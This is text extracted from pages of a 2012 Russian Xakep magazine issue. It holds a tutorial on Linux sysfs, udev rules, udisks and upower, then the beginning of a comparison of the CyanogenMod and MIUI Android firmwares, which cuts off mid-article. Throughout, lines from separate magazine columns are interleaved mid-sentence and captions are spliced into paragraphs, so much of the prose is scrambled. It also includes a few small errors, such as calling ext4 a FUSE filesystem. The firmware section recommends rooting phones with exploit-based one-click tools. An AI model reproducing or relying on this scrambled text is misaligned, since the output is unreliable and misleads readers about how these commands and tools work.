• В скором времени большое количество gl/Mi23E.
OpenSource-шутеров сможет перейти на ис-
пользование движка id Tech 4, на базе кото-
рого построен Doom 3. Движок был недавно
открыт компанией Zenimax (спасибо Джону
Кармаку за замечательную традицию) под
GPLv3 (с небольшими поправками). Демонстрация работы Wayland. Пока в X.Org

ХАКЕР 04 /159/ 2012 105

UNIXOID Евгений Зобнин ([email protected])

ЗВЕНЬЯ
ОДНОЙ ЦЕПИ
РАЗБИРАЕМСЯ ВВЕДЕНИЕ
Строго говоря, sysfs — это только один из кирпичиков системы
умного управления оборудованием, появившейся в Linux в по-
С KOBJECTS, SYSFS, следние годы. Сама по себе эта файловая система практически
бесполезна и может дать желаемый результат только в сочетании

UDEV, UDISKS с другими системами, построенными на ее основе, такими как udev

(динамически создающей файлы устройств в каталоге /dev), udisks
(автоматически монтирующей файловые системы вновь подклю-
И UPOWER ченных накопителей) и upower (системы управления питанием,
реагирующей на сообщения подсистемы ACPI и подстраивающей
параметры системы, используя sysfs). Но начнем с корневого
элемента.
Одним из главных новшеств ядра Linux
версии 2.6 стала поддержка виртуальной KOBJECTS И SYSFS
Одной из целей разработки ядра 2.5, которое после стабилизации
файловой системы sysfs, экспортирующей превратилось в 2.6, была переработка и унификация модели драйве-
информацию об установленном оборудовании ров, которая к тому времени стала слишком громоздкой, запутанной
и сложной для понимания. С этой целью была придумана абстрак-
и позволяющей управлять его настройкой. ция, названная KObject — простая структура данных, позволяющая
Сегодня возможности sysfs широко однозначно идентифицировать и связывать между собой различные
устройства, которые «видит» операционная система. Фактически,
используются во всех дистрибутивах для теперь каждое устройство, начиная от системного таймера и закан-
определения железа, автоматической чивая SCSI-приводом, было привязано к собственному уникальному
K-объекту, который не только позволял точно идентифицировать
загрузки модулей и монтирования файловых его, но и связать с другими К-объектами по принципу «родитель-
систем. Но что представляет собой данная потомок». Например, usb-порт является «родителем» воткнуто-
го в него usb-устройства. Также были придуманы специальные
ФС, и какие плюсы она может дать обычным объединения К-объектов (kset) для представления различных под-
юзерам, знает далеко не каждый. систем, но в контексте данной статьи это роли не играет.

106 ХАКЕР 04 /159/ 2012

 Звенья одной цепи

/sys/class/ — группировка устройств по классам.

В /sys/device можно найти любое устройство, известное ядру,

однако для удобства предусмотрены еще три мета-каталога, ко-
торые группируют устройства различными способами. Обращаясь
к файлам внутри них, ты так или иначе попадешь в нужное дерево /
sys/devices по символической ссылке. Также sysfs предлагает не-
сколько специальных каталогов для сервисных нужд:

/sys/firmware/ — закрытые файлы firmware, нужные для работы

некоторых устройств;
/sys/fs/ — управление файловыми системами, основанными на
FUSE (например ext4 и ФС);
/sys/kernel/ — интерфейс низкоуровневого управления ядром
(профилирование, дебаг и так далее);
/sys/module/ — все модули, загруженные ядром, — по
каталогу на каждый (обычно есть подкаталог parameters,
позволяющий управлять опциями модуля);
/sys/power/ — контроль параметров энергопотребления.

С наскоку разобраться в дереве каталогов sysfs проблематично.

Но делать этого и не требуется, — файловая система никогда не
Часть файла modules.alias
была предназначена для ковыряния руками, поэтому мы перехо-
дим к обсуждению инструментов, которые наиболее полно исполь-
В определенный момент для отладки всего этого хозяйства зуют ее возможности.
была реализована виртуальная файловая система ddfs (Device
Drivers FileSystem), которая позволяла представить все отношения UDEV
К-объектов в виде дерева каталогов и файлов. Позднее файловую Зачем же нужна sysfs, если ее нельзя потрогать, что называется,
систему переименовали в sysfs, и она стала неотъемлемой частью голыми руками? Все дело в приложениях пространства пользова-
модели драйверов Linux. Что же дает sysfs операционной системе? теля. В Linux никогда не существовало единого механизма управ-
Так как sysfs является визуальным представлением связи всех ления оборудованием, который могли бы использовать приложе-
К-объектов ядра, а К-объекты — представлением оборудования, ния, работающие вне ядра. Какую-то информацию можно было
установленного в компе, то мы получаем своего рода вход в святая получить с помощью procfs, другую — с помощью ioctl-вызовов
святых операционной системы. Например, мы можем проследить, к файлам устройств, третью — напрямую из памяти ядра (так де-
как устройства объединены с помощью шин, на каком SATA-порту лает dmidecode). Но единого интерфейса, который бы выдавал всю
висит жесткий диск, определить его производителя, модель, подноготную компа, не было. И sysfs стала просто спасением для
характеристики и даже изменить параметры работы. Собственно, разработчиков софта и дистрибутивов: они получили инструмент,
почти все, что ядро знает про устройство и может с ним проделать, с помощью которого можно производить автоконфигурирование
можно узнать (и выполнить) с помощью чтения и записи файлов. ОС, адекватно реагировать на горячее подключение устройств
Приведу пример. Выполни следующую команду: и события plug and play.
Первой разработкой, которая начала использовать sysfs на всю
$ cat /sys/class/net/eth0/address катушку, стал демон udev, предназначенный для автоматическо-
го создания файлов устройств в каталоге /dev при подключении
На экран будет выдан MAC-адрес сетевой карты eth0. Прочитав к компу нового устройства. Udev подключается к ядру с помощью
другие файлы каталога /sys/class/net/eth0, ты сможешь выяснить netlink-сокета, по которому получает извещения (так называемые
такую информацию, как скорость интерфейса, поддержку режима uevent) о происходящих в системе событиях, таких как подключе-
дуплекса и многое другое. ние USB-принтера или отключение мышки. Вместе с информацией
Команда cat /sys/block/sda/size выведет на экран размер о событии, а также данными о самом устройстве, демон получает
диска sda, представленный в 512-байтных блоках. путь к каталогу внутри sysfs, представляющему подключенное
А команда устройство. На основе данных, полученных из sysfs, и написанных
заранее правил демон создает файл устройства внутри /dev, давая
# echo performance > /sys/devices/system/cpu/cpu0/cpu-
freq/scaling_governor

переведет первое ядро процессора (или все сразу, если про-

цессор не поддерживает раздельное управление) в режим макси-
мальной производительности. Кроме демонстрации возможностей
sysfs, эти примеры показывают еще одну особенность файловой
системы. Обрати внимание, что в качестве первого элемента
пути используются разные по сути имена каталогов: class, block,
devices. Но это не бардак в головах разработчиков, а фича фай-
ловой системы. Дело в том, что добраться до любого устройства
с помощью sysfs можно несколькими путями:

/sys/device/ — дерево устройств так, как его видит ядро;

/sys/block/ — блочные устройства;
/sys/bus/ — перечень шин, зарегистрированных в ядре; Хождение по sysfs может здорово запутать

ХАКЕР 04 /159/ 2012 107

UNIXOID

Команда «udevadm monitor» позволяет просмотреть события udev в режиме реального Результат выполнения команды «udisks --show-info /dev/sda»
времени

ему нужные права и назначая minor/major-номера. и именно поэтому ты можешь не заботиться о самостоятельном
Кроме различных низкоуровневых файлов, описывающих запуске нужных приложений. При подключении веб-камеры на
устройство (например, vendor — производитель, model — модель экране сразу появляется окно менеджера фотографий, а при
устройства), в sysfs есть и еще один очень важный файл modalias, подключении принтера происходит его автоконфигурирование.
содержащий строку вида "pci:v000010ECd00008139sv00001734sd Каждая среда использует свой набор приложений и сервисов
000010B8bc02sc00i00". Это уникальный идентификатор устрой- для взаимодействия с udev, но есть два инструмента, которые
ства, который используется udev для загрузки нужного модуля используют все, — это udisks и upower.
устройства. Он генерируется во время сборки ядра на основе кода
драйверов, каждый из которых содержит список идентификаторов UDISKS И UPOWER
поддерживаемых устройств. Этот список сохраняется в файл /lib/ Демоны udisks и upower представляют собой менеджеры дисков
modules/ВЕРСИЯ_ЯДРА/modules.alias, описывающий псевдоимена и питания соответственно. Изначально они были частью проекта
модулей для команды modprobe. Все что остается сделать udev DeviceKit, но когда многие компоненты последнего были перене-
для загрузки нужного драйвера, это выполнить команду modprobe сены в udev, стали отдельными проектами. Оба демона исполь-
с аргументом в виде содержимого файла modalias устройства. Ты зуют udev, sysfs и d-bus для получения информации о железе,
можешь попробовать сделать это сам: нотификаций о подключении дисков или изменении режима
питания и отправки этой информации вовне.
# modprobe pci:v000010ECd... Поначалу может показаться странным, что при наличии sysfs,
знающем о железе все, и udev, информирующем о «железных
Одно из самых важных качеств udev, отличающих его от событиях» весь остальной мир, нужны еще какие-то внешние
прошлой реализации devfs, работающей внутри ядра, состоит инструменты. На самом же деле существование udisks и upower
в том, что он позволяет пользователю контролировать процесс действительно важно, так как это не просто очередные ноти-
создания файлов в каталоге /dev, а также запускать различные фикаторы, а полноценные менеджеры. Udisks, например, кроме
приложения на основе тех или иных параметров устройства, извещения системы о подключении новых дисков (что и так без
полученных от sysfs. Такая особенность позволяет делать очень него делает udev) имеет встроенный интерфейс управления:
интересные вещи, — например, назначать своей личной флешке по запросу другого приложения он может выдать подробную
уникальное имя внутри /dev или запускать приложение син- информацию о накопителе, его разметке, смонтировать/раз-
хронизации файлов, если в систему была воткнута цифровая монтировать разделы, выполнить низкоуровневые операции над
камера. Все это делается с помощью udev-правил. Системные устройством, остановить шпиндель и так далее. Чтобы проде-
правила хранятся в каталоге /lib/udev/rules.d, а для пользовате- лать эти действия самостоятельно, приложению пришлось бы
лей и администраторов предусмотрен каталог /etc/udev/rules.d. иметь права root на запись файлов в sysfs и монтирование, здесь
Позже мы рассмотрим несколько примеров использования этого же оно может просто подключиться к d-bus, запросить права
каталога. у PolicyKit и слать запросы. Немаловажно также, что udisks уме-
Чтобы информировать другие службы об изменении кон- ет выполнять поллинг устройств (например, для обнаружения
фигурации устройств и подключении новых, udev использует компакт-диска в приводе), на что не способен udev.
шину d-bus. Любое приложение, имеющее соответствующие Демон udisks снабжен утилитой пространства пользователя,
права, предоставленные тулкитом PolicyKit, может подклю- с помощью которой можно выполнить многие действия над на-
читься к шине с целью получения уведомлений и выполнения копителями. Например, чтобы просмотреть подробную инфор-
ответных действий. Так делает любая среда рабочего стола, мацию обо всех дисках системы, можно выполнить следующую
команду:

$ udisks --dump

ЧТОБЫ ИНФОРМИРОВАТЬ Для получения информации о конкретном накопителе, включая

модель, характеристики и информацию SMART:
ДРУГИЕ СЛУЖБЫ ОБ ИЗМЕНЕНИИ
$ udisks --show-info /dev/sda
КОНФИГУРАЦИИ УСТРОЙСТВ
Для извлечения диска:
И ПОДКЛЮЧЕНИИ НОВЫХ, UDEV
$ udisks --eject /dev/cdrom
ИСПОЛЬЗУЕТ ШИНУ D-BUS
108 ХАКЕР 04 /159/ 2012
 Звенья одной цепи

Архитектура udev как она есть

Для установки таймаута на остановку диска: ность, связанную с управлением питанием. Он занимается тем,
что следит за состоянием питания устройств, может управлять
$ udisks --set-spindown /dev/sda --spindown-timeout СЕКУНДЫ режимами энергосбережения различных компонентов ПК и из-
вещать систему о таких событиях, как переход на использование
И, кстати говоря, все эти действия не потребуют прав root. Со- аккумулятора и сильный нагрев винчестера или видеокарты.
временные DE уже перешли на использование udisks в качестве Пока он находится в начальной стадии разработки, поэтому
менеджера накопителей и используют его даже в утилитах раз- лишь немногие дистрибутивы задействуют его возможности,
метки дисков. Также есть несколько проектов создания легковес- предпочитая использовать udev, sysfs и ACPI.
ных демонов автомонтирования, например devmon. Просто уста- Как и udisks, upower имеет утилиту управления, однако един-
нови udisks и devmon, а затем добавь в конец файла ~/.xsession ственное, что можно получить от нее на данном этапе развития,
строку (заменив fluxbox на свой менеджер окон): это сводку о состоянии питания различных компонентов машины.
Сделать это можно с помощью команды «upower --dump».
exec ck-launch-session bash -c "devmon & fluxbox"
ТРЮКИ
Так диски будут монтироваться автоматически. Вернемся к sysfs и udisks и посмотрим, какие интересные вещи
Демон upower предоставляет аналогичную функциональ- можно сделать с их помощью. Начнем с sysfs:

ХАКЕР 04 /159/ 2012 109

UNIXOID

1. Получение статистики использования сетевых интерфейсов: INFO

Если ты хочешь
$ grep -r . /sys/class/net/eth0/statistics самостоятельно
разобраться во
внутренностях sysfs,
2. Информирование системы о том, что диск не является механи- советую начать
ческим (позволяет сделать ввод-вывод при использовании SSD с каталога /sys/class,
который сортирует
чуточку быстрее): устройства в более
удобном для
# echo 0 > /sys/block/sdb/queue/rotational понимания виде.

В каждом каталоге
3. Принудительный рескан SCSI-устройств (например для добавле- устройства sysfs
есть файл uevent,
ния на лету новых разделов в виртуальной машине): содержащий имя
устройства и его
# echo "- - -" > /sys/class/scsi_host/host0/scan major/minor-номера.
Он используется
udev для создания
4. Получение информации о питании каждого USB-порта: файлов устройств во
время загрузки.
Результат выполнения команды «upower --dump»
$ for i in `find /sys/devices/*/*/usb* \
-name level`; do echo -n "$i: "; cat $i; done
разделы флешки в каталог /mnt. При выдергивании происходит
5. Информация о компе (производитель, материнская плата и так размонтирование.
далее):
2. Синхронизация файлов:
# cat /sys/devices/virtual/dmi/id/*
ACTION=="add", KERNEL=="sd</a-z><a-z><0-9>",
6. Температура процессора: ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/cp -a /mnt/%k /backup/%k"
# cat /sys/class/hwmon/hwmon0/temp1_input
Это правило позволяет синхронизировать содержимое флешки
7. Управление яркостью экрана (максимальная яркость прописана с каталогом файловой системы (в данном случае /backup/имя_
в /sys/class/backlight/acpi_video0/max_brightness): устройства) с помощью обычного cp. Его следует поместить перед
последней строкой предыдущего набора правил.
# echo 8 > /sys/class/backlight/acpi_video0/brightness
3. Назначение статичных имен сетевым картам:
8. Перевод системы в спящий режим (вместо mem можно использо-
вать disk для гибернации): SUBSYSTEM=="net", ATTR{address}=="aa:bb:cc:dd:ee:ff",
NAME="lan0"
# echo mem > /sys/power/state SUBSYSTEM=="net", ATTR{address}=="ff:ee:dd:cc:bb:aa",
NAME="wlan0"
Это только малая часть того, что можно сделать, используя
sysfs. В любом случае, лучше самостоятельно покопаться в недрах Правила проверяют MAC-адрес устройства и на его основе на-
файловой системы с помощью файлового менеджера. значают имя. Строка ATTR{address} позволяет получить содержи-
Теперь поговорим об udev. Демон udev имеет систему пра- мое файла address внутри каталога устройства в sysfs.
вил, которые описывают то, как он именует создаваемые файлы
устройств, какие права им назначает и что делает после созда- 4. Автоматическое отключение тачпада при подключении мыши:
ния. Правила имеют простой формат и помещаются в файлы вну-
три каталогов /lib/udev/rules.d (системный) или /etc/udev/rules.d. ACTION=="add", SUBSYSTEM=="input", KERNEL=="mouse[1-9]",
По соглашению все файлы правил имеют префикс в виде цифры, ENV{DISPLAY}=":0.0",
который определяет порядок их загрузки. Мы назовем свой файл ENV{XAUTHORITY}="/home/USERNAME/.Xauthority",
/etc/udev/rules.d/99-custom.rules. Что в него можно поместить? ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", KERNEL=="mouse[1-9]",
1. Автомонтирование: ENV{DISPLAY}=":0.0",
ENV{XAUTHORITY}="/home/USERNAME/.Xauthority",
ACTION=="add", KERNEL=="sd<a-z><0-9>", ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=0"
ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/mkdir -p /mnt/%k" Правила используют утилиту synclient для отключения тачпада,
ACTION=="add", KERNEL=="sd</a-z><a-z><0-9>", если в систему воткнуто устройство с именем типа /dev/mouse0,
ENV{ID_USB_DRIVER}="usb-storage", /dev/mouse1 и так далее.
RUN+="/bin/mount -o rw,noexec,dmask=000,fmask=111,utf8
/dev/%k /mnt/%k" ВЫВОДЫ
ACTION=="remove", KERNEL=="sd</a-z><a-z><0-9>", Файловая система sysfs не только позволила Linux сделать
ENV{ID_USB_DRIVER}="usb-storage", большой шаг вперед на пути к интеллектуальному десктопу,
RUN+="/bin/umount /mnt/%k" способному к самоконфигурированию, но и дала гикам отличный
инструмент для управления оборудованием. В этой статье мы рас-
Эта самый простой вариант автомонтирования, который работа- смотрели лишь часть возможностей комплекса sysfs+udev+udisks.
ет только в отношении USB-флешек. Правила проверяют устрой- Вероятно, ты сможешь придумать и более изощренные способы
ство на принадлежность к классу USB Mass Storage и монтируют его использования. z

110 ХАКЕР 04 /159/ 2012

UNIXOID Евгений Зобнин (execbit.ru)

ЗЕЛЕНЫХ РОБОТОВ
ВЫБИРАЕМ АЛЬТЕРНАТИВНУЮ
ANDROID-ПРОШИВКУ: CYANOGENMOD VS MIUI
Какую альтернативную прошивку ПРЕДИСЛОВИЕ почти с момента появления первого смартфона
Android выбрать для установки Строго говоря, CyanogenMod и MIUI не альтер- под управлением Android. Ее создал энтузиаст
нативные прошивки, а самые настоящие форки с xda-developers, скрывающийся под ником
на свой девайс? Наверняка ты операционной системы Android. Каждый из них Cyanogen (настоящее имя — Стив Кондик, не так
не раз задавался этим вопросом. включает в себя огромное количество измене- давно он начал работать в компании Samsung),
ний, которые из-за политики Google никогда не который взял за основу прошивку, созданную
Существует множество самых попадут в официальную версию ОС. Оба проекта JesusFreke. Изначально CyanogenMod пред-
разнообразных прошивок для развиваются большой командой разработчиков, ставлял собой простую модификацию ориги-
которые выполняют порты прошивки на самые нального Android, установленного на смартфон
сотен устройств, однако среди разнообразные и экзотические устройства T-Mobile G1 (Android 1.5). Однако позднее, после
всего этого разнообразия (например, существует порт CyanogenMod на присоединения к Cyanogen других разработчи-
смартфон Geeksphone One, — думаю, о нем ков и открытия кода операционной системы,
настоящих бриллиантов только большинство читателей вряд ли слышали). она превратилась в настоящий форк, сборка
два: CyanogenMod и MIUI. В чем Какую прошивку выбрать для своего аппарата которого осуществлялась из собственного репо-
— решай сам, я же помогу тебе определиться, зитория исходных текстов, включающего в себя
их преимущество, почему рассказав о возможностях и тонкостях работы множество поправок в оригинальные исходни-
они получили столь широкое с каждой из них. ки, опубликованные Google.
распространение, и как Сегодня за развитие CyanogenMod отвечают
CYANOGENMOD. ФОРК ANDROID десятки разработчиков со всего мира, а база
загрузить их на свой девайс, — В ЛУЧШИХ ТРАДИЦИЯХ официально поддерживаемых устройств вклю-
обо всем этом ты узнаешь прямо OPEN SOURCE чает в себя 56 моделей смартфонов и планше-
Итак, CyanogenMod (cyanogenmod.com). На- тов, среди которых есть как топовые девайсы
сейчас. верное, самая популярная прошивка Android типа Google Nexus S и HTC Incredible, так и бюд-
из всех существующих. Ведет свою историю жетные устройства вроде HTC Tattoo и Huawei

ХАКЕР 04 /159/ 2012 111

UNIXOID

выполнять опасные для пользователя функ-

ции (например, отправлять СМС).
• Встроенный клиент OpenVPN, имеющий
графический интерфейс для настройки.
• Доработки в камере (например, функция
tap-to-focus), номеронабирателе и СМС-
приложении.
• Кнопки управления функциями смартфона
прямо в выпадающей панели уведомлений.

УСТАНОВКА
Впечатляет, не правда ли? Теперь попробуем
установить это чудо инженерной мысли на свой
смарт. Что для этого нужно? Все то же самое,
что и для установки любой другой прошивки:
Управляем привилегиями Настройки производитель- Номеронабиратель и СМС-приложение MIUI
приложения в CyanogenMod ности в CyanogenMod root-доступ, кастомная консоль восстановления
(recovery), сама прошивка и набор закрытых
U8220. Неофициальные версии прошивки для и ssh, которые позволяют комфортно работать Google-приложений (Маркет, Gmail и прочие).
десятков других моделей можно найти на фору- при подключении с помощью SSH или adb. Получив root, мы сможем изменить boot-раздел
мах xda-developers.com. Последняя стабильная Для запуска SSH-сервера можно использо- внутренней NAND-памяти, что позволит за-
версия прошивки имеет номер 7.1.0 и основана вать графический интерфейс. писать в него модифицированную консоль
на коде Android 2.3.7. Также ведется работа • Меню настроек существенно расширено восстановления (которая, в отличие от штатной,
над девятой версией прошивки, базирующей- и включает в себя множество пунктов для способна устанавливать прошивки без цифро-
ся на коде Android 4.0.3 (предполагалась, что тонкого тюнинга ОС. вой подписи производителя аппарата).
версия 8.0 будет основана на Android 3.0, но • Поддержка тем, разработанных компанией По умолчанию в Android пользователь root не
в связи с отказом Google выкладывать ее код T-Mobile. Темы устанавливаются с помощью имеет пароля, но получить его права невозмож-
в свободный доступ образовался разрыв между Android Market. но из-за отсутствия в системе инструментов для
версиями). Несмотря на сырость CyanogenMod • В состав прошивки включена поддержка логина (/bin/login) или изменения UID (/bin/su).
9, в Сети уже можно найти множество ее сборок формата FLAC. Поэтому систему необходимо поломать с помо-
для различных устройств. • Доработанное меню перезагрузки, с помо- щью одного из множества Android-эксплойтов.
щью которого можно перезагрузить телефон Вручную делать это совсем не обязательно:
ОТЛИЧИЯ И ВОЗМОЖНОСТИ прямо в консоль восстановления. для Android можно воспользоваться прило-
Чем же так хорош CyanogenMod, почему он за- • Поддержка Wi-Fi, Bluetooth и USB-тизеринга жением zroot (goo.gl/mp6wg), а в Windows или
служил свою популярность? Ответов здесь два. (эта функциональность появилась в CM еще Linux — SuperOneClick (goo.gl/HIbN), которое
Во-первых, CyanogenMod создан гиками и для до ее анонса в Android 2.2). можно запустить с помощью mono. Обе софтины
гиков, поэтому в его комплекте есть множество • Встроенный эквалайзер, который работает используют распространенные дыры в Android,
инструментов, полезных продвинутому поль- в отношении всех приложений. а поэтому способны зарутить множество различ-
зователю: например, встроенный SSH-сервер, • Многочисленные оптимизации и доработки ных устройств. Если не заработают, попробуй
интерфейс тюнинга низкоуровневых параме- в низкоуровневой части ОС, включая пере- найти руководство для своего девайса в google.
тров ОС и полноценная консоль с bash и busybox. работанную библиотеку Bionic. Далее необходимо установить кастомный
Во-вторых, в разработке CyanogenMod при- • Механизм строгих ограничений, позволяю- recovery. SuperOneClick делает это автомати-
нимает участие большое количество независи- щий запретить тем или иным приложениям чески, для всего остального есть Rom Manager,
мых разработчиков, каждый из которых может
реализовать интересную идею и рассчитывать,
что его патч будет принят в основную базу
кода. В результате в CyanogenMod можно найти
множество очень оригинальных доработок,
таких как интерфейс управления питанием
в выпадающей панели, механизм принудитель-
ного ограничения приложений в возможностях,
встроенный эквалайзер и так далее. Плюс ко
всему CyanogenMod включае т в себя большое
количество оптимизаций, которые действитель-
но поднимают производительность аппарата.
Вот далеко не полный список того, что
есть в CyanogenMod, и чего нет в стандартном
Android:
• Поддержка /etc/init.d. В CyanogenMod, как и в
Linux, можно создавать загрузочные скрипты
для запуска сторонних демонов (например,
samba или ftpd) и команд (для оптимизации
управления памятью, например).
• Возможность установки приложений на карту
памяти. В CyanogenMod есть собственный,
более прозрачный механизм установки при-
ложений на ext2-раздел карты памяти.
• Прошивка включает в себя bash, busybox Рутинг смартфона с помощью SuperOneClick

112 ХАКЕР 04 /159/ 2012

 Битвы зеленых роботов

который можно установить прямо через Маркет • Для полной выгрузки приложения из памяти • Чтобы переключать музыкальные компози-
(goo.gl/W8dJK). Запустив его, выбираем пункт можно использовать долгое нажатие на ции долгим нажатием кнопки управления
«Flash ClockworkMod Recovery». Далее за- кнопку «Назад». Но функцию необходимо громкостью, активируй данную опцию: Menu
кидываем на карту памяти прошивку (ее можно активировать в настройках: Menu Æ Settings Æ Settings Æ CyanogenMod Settings Æ Input Æ
получить здесь: cyanogenmod.com/devices) Æ Application Settings Æ Development Æ Stop Volume button music controls.
и приложения Google (goo.gl/6OchT). Вновь воз- app via long-press. • Музыкальный проигрыватель также поддер-
вращаемся в Rom Manager и перезагружаемся • CyanogenMod поддерживает жесты на экране живает управление жестами: Плеер Æ Menu
в консоль восстановления, нажав «Reboot into блокировки для выполнения различных Æ Music Settings Æ Enable gestures.
Recovery». Оказавшись в консоли восстановле- функций или запуска приложений. Активация • Чтобы запретить приложениям выполнять те или
ния (или «инженерном меню», как его любят на- и управление в настройках: Menu Æ Settings иные действия (например, отправку СМС или чте-
зывать студенты технических вузов), нажимаем Æ CyanogenMod Settings Æ Lockscreen Æ ние списка контактов), открой меню управления
клавишу уменьшения громкости до тех пор, пока Lockscreen gestures. приложениями (Menu Æ Settings Æ Applications Æ
не дойдем до пункта «Wipe data/factory reset», • Цвет и поведение LED-индикатора можно Manage Application), выбери нужную программу и в
входим в меню кнопкой включения, выбираем изменить: Menu Æ SettingsÆ CyanogenMod разделе Permissions тапни по тем возможностям,
«Yes». Возвращаемся на уровень выше, выбира- Settings Æ Interface > LED notifications. которые ты хотел бы отключить.
ем «Install zip from sdcard», выбираем прошивку, • В отличие от Android, CyanogenMod способен • Для устройств с неудобной или сломанной
снова нажимаем «Yes». Таким же образом про- устанавливать на карту памяти любые прило- клавишей включения можно настроить вклю-
шиваем приложения Google. В конце возвраща- жения, вне зависимости от того, хотят они это- чение экрана с помощью клавиши «Меню»:
емся в корень меню и выбираем «Reboot system го или нет. Полезная функция для владельцев Menu ÆSettings Æ CyanogenMod settings Æ
now». смартфонов с ограниченным объемом памяти, Lockscreen Æ Unlock options Æ Menu unlock.
но опасная, так как не все приложения будут • Чтобы в списке запущенных приложений,
ИСПОЛЬЗОВАНИЕ работать корректно: Menu Æ Settings Æ доступном через долгое нажатие клавиши
В этом разделе мы поговорим о возможностях CyanogenMod SettingsÆ Application Settings Æ «Домой», видеть более восьми приложений,
прошивки. Их много, и почти все — скрыты Install location. измени значение с помощью настроек: Menu
в пользовательских настройках. Мы остановим- • CyanogenMod умеет автоматически об- Æ CyanogenMod settings Æ Input ÆLong press
ся на наиболее интересных и полезных. новляться. Для этого активируй соответ- home settings Æ Number of recent apps.
• Переключатели в выпадающей панели. Очень ствующий механизм: Menu Æ Settings Æ • Для повышения скорости загрузки отключи
удобная вещь, которая перекочевала в MIUI. CyanogenMod Settings Æ System Æ Update ее анимацию: Menu Æ CyanogenMod settings
По умолчанию их четыре, но количество и суть notifications. Æ Performance Æ Disable boot animation.
переключателей можно изменить в настрой- • Для показа заряда батареи в процентах Там же стоит включить опцию «Lock home in
ках: Menu Æ Settings Æ CyanogenMod Settings включи следующую опцию: Menu Æ Settings memory», чтобы запретить выгрузку рабочего
Æ Interface Æ Notification Power Widget Æ Æ CyanogenMod Settings Æ Status bar tweaks стола из памяти и избежать связанных с этим
Widget Buttons. Æ Battery Status Style Æ Percentage. лагов.

Окно настроек MIUI

ХАКЕР 04 /159/ 2012 113

UNIXOID

MIUI с темой Samsung Galaxy S

• Для снятия скриншота нажми кнопку вклю- Основной козырь MIUI — это интеграция 3. Встроенная защита от вредоносного ПО. В от-
чения и тапни по пункту «Screenshot», он компонентов системы друг с другом и общая за- личие от CyanogenMod, в котором ограниче-
будет сохранен на SD-карте, в каталоге DCIM/ конченность ОС. В отличие от других прошивок, ния приложений на выполнение каких-либо
Screenshots. она не выглядит недоработанной, здесь все опасных действий приходится устанавливать
• В состав CyanogenMod включено приложение подчинено общей идее и работает на удивление вручную, MIUI уведомляет пользователя о по-
DSPManager, позволяющее управлять на- слаженно. Например, если ты читаешь на сайте пытке приложения выполнить такое действие
стройками эквалайзера по отдельности для разработчиков о поддержке тем, то можешь и предлагает ему выбор «запретить/разре-
различных устройств вывода звука (наушни- быть уверен, что это не просто изменение цвета шить». Так, например, если какая-либо про-
ки, динамик). и внешнего облика графических элементов, грамма попытается отправить СМС, на экране
а полная модификация всех графических со- появится соответствующее сообщение.
MIUI. ANDROID ПО-КИТАЙСКИ ставляющих прошивки, начиная от анимации 4. Встроенный монитор сетевого трафика.
Теперь поговорим о другой прошивке со стран- загрузки и заканчивая внешним видом строки Действительно удобное приложение для про-
ным названием MIUI (произносится как «Me состояния. И да, конечно же ты получишь в рас- смотра статистики использования интернета
You I»). В отличие от CyanogenMod, развивае- поряжение менеджер тем, позволяющий искать, по дням и неделям с возможностью установки
мой сообществом на добровольных началах, просматривать и устанавливать новые темы, ко- лимита, а также полезной функцией авто-
за разработку MIUI отвечает вполне реальная торые будут автоматически закачаны с сервера отключения 3G при отсутствии активности.
китайская компания Xiaomi Tech (xiaomi.com), проекта. То же самое можно сказать и о любом В качестве бонуса доступен встроенный
бизнес которой строится на разработке мобиль- другом элементе ОС, включая стандартные при- брандмауэр, позволяющий отключать интер-
ных приложений для операционных систем iOS ложения для дозвона и отправки СМС. Трудно нет для отдельно взятых приложений.
и Android.Запущенная в 2010 году, компания описать все это по пунктам, поэтому я ограни- 5. Встроенный файервол для блокирования
изначально специализировалась только на чусь своеобразным хит-парадом возможностей звонков и СМС-сообщений от особо назой-
разработке стека приложений для Android, MIUI, которых нет ни в CyanogenMod, ни, тем ливых. Вполне стандартный, но отлично
включающего в себя музыкальный плеер, гале- более, в стандартном Android: функционирующий, в отличие от сторонних
рею, камеру, номеронабиратель и приложение 1. Номеронабиратель с поддержкой T9-поиска. приложений, половина из которых вообще не
для работы с контактами. Позднее Xiaomi Tech По большому счету, ничем не лучше и не работает.
объединила этот набор с наработками проекта хуже Dialer One, но он включен в комплект ОС 6. Встроенная программа для бэкапа прило-
CyanogenMod и начала работу над новой про- и полностью подчиняется менеджеру тем. жений и настроек (с возможностью хранения
шивкой с полностью переработанным внешним 2. Простое и стильное приложение для работы в облаке).
обликом, поддержкой тем, собственным домаш- с СМС, которым действительно удобно поль- 7. Регулярные OTA-обновления раз в неделю.
ним экраном и многими другими новшествами. зоваться. Приложение уведомляет о доставке Каждую пятницу смартфон будет предлагать
В результате получилась стильная и неверо- СМС адресату, выводит текст пришедшей СМС установить новую версию прошивки в полно-
ятно удобная в использовании операционная прямо на экран, предоставляя возможность стью автоматическом режиме.
система, которая к текущему моменту не менее быстрого ответа, и тоже подчиняется установ- 8. Синхронизация с облаком. MIUI умеет
известна, чем CyanogenMod. ленной теме. синхронизировать приложения, настройки,

114 ХАКЕР 04 /159/ 2012

 Битвы зеленых роботов

INFO
• Официальные
аппараты Google,
такие как Google
Nexus One, Google
Nexus S и Samsung
Galaxy Nexus,
изначально имеют
root-доступ.

• Название MIUI
состоит из двух
частей: MI, которая
значит Mobile
Internet (или, как
это ни странно,
Mission Impossible),
и UI — User Interface.
Таким образом
в совокупности
название можно
перевести как
«интерфейс
для мобильного
интернета».

MIUI со стандартной темой

контакты, бэкапы и прочее с собственным УСТАНОВКА окно голосового поиска.

облачным сервисом. Установка MIUI на смартфон почти полно- 3. Долгое нажатие на переключатель в вы-
9. Возможность изменения размера шрифта стью аналогична установке CyanogenMod, падающем меню откроет окно настройки
сразу для всех приложений. Одна из тех за исключением того, что приложения соответствующей опции.
функций, которой так не хватает в стан- Google, такие как Маркет и Gmail, уже 4. Для снятия скриншота одновременно наж-
дартном Android. входят в комплект прошивки, и их не нужно ми кнопку «Меню» и клавишу уменьшения
10. Менеджер запущенных приложений с воз- доустанавливать отдельно. В то же время громкости.
можностью выгрузки из памяти. к выбору источника для скачивания следует 5. Для удаления сообщения в СМС-
отнестись с осторожностью. Дело в том, приложении быстро проведи пальцем по
К сожалению, не обошлось и без ложки что в оригинале MIUI поддерживает только горизонтальной линии.
